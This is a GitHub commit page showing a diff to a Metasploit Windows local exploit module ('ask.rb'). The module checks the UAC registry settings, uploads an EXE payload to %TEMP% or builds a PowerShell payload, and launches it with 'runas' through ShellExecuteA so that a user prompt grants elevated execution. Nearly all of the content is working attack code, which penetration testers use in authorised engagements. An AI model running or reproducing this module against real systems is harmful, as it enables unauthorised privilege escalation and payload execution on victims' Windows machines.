Skip to content

Commit 6881774

Browse files
committed
Updated with comments from jlee-r7 and Meatballs1
Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE']
1 parent a5dc75a commit 6881774

File tree

1 file changed

+25
-44
lines changed
  • modules/exploits/windows/local

1 file changed

+25
-44
lines changed

modules/exploits/windows/local/ask.rb

Lines changed: 25 additions & 44 deletions
Original file line numberDiff line numberDiff line change
@@ -42,14 +42,13 @@ def initialize(info={})
4242
register_options([
4343
OptString.new("FILENAME", [ false, "File name on disk"]),
4444
OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
45-
OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
45+
OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
4646
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
4747
])
4848

4949
end
5050

5151
def exploit
52-
5352
root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
5453
open_key = session.sys.registry.open_key(root_key, base_key)
5554
lua_setting = open_key.query_value('EnableLUA')
@@ -63,56 +62,38 @@ def exploit
6362
uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
6463

6564
case uac_level.data
66-
when 2
67-
print_status "UAC is set to 'Always Notify'"
68-
print_status "The user will be prompted, wait for them to click 'Ok'"
69-
when 5
70-
print_debug "UAC is set to Default"
71-
print_debug "The user will be prompted, wait for them to click 'Ok'"
72-
when 0
73-
print_good "UAC is not enabled, no prompt for the user"
65+
when 2
66+
print_status "UAC is set to 'Always Notify'"
67+
print_status "The user will be prompted, wait for them to click 'Ok'"
68+
when 5
69+
print_debug "UAC is set to Default"
70+
print_debug "The user will be prompted, wait for them to click 'Ok'"
71+
when 0
72+
print_good "UAC is not enabled, no prompt for the user"
7473
end
7574

76-
7775
#
7876
# Generate payload and random names for upload
7977
#
80-
81-
if datastore["TECHNIQUE"] == "EXE"
82-
if datastore["UPLOAD"]
83-
exe_payload = generate_exe_payload_exe
84-
85-
if datastore["FILENAME"]
86-
payload_filename = datastore["FILENAME"]
87-
else
88-
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
89-
end
90-
91-
if datastore["PATH"]
92-
payload_path = datastore["PATH"]
93-
else
94-
payload_path = session.fs.file.expand_path("%TEMP%")
95-
end
96-
78+
case datastore["TECHNIQUE"]
79+
when "EXE"
80+
exe_payload = generate_payload_exe
81+
payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
82+
payload_path = datastore["PATH"] || expand_path("%TEMP%")
9783
cmd_location = "#{payload_path}\\#{payload_filename}"
98-
9984
if datastore["UPLOAD"]
10085
print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
101-
fd = session.fs.file.new(cmd_location, "wb")
102-
fd.write(exe_payload)
103-
fd.close
86+
write_file(cmd_location, exe_payload)
87+
else
88+
#print_error("No Upload Path!")
89+
fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
90+
return
10491
end
105-
106-
session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
107-
else
108-
print_error("No Upload Path!")
109-
return
110-
end
111-
else
112-
command = cmd_psh_payload(payload.encoded)
113-
arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
114-
session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
92+
command, args = cmd_location,nil
93+
session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
94+
when "PSH"
95+
command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
11596
end
97+
session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
11698
end
117-
end
118-
99+
end

0 commit comments

Comments
 (0)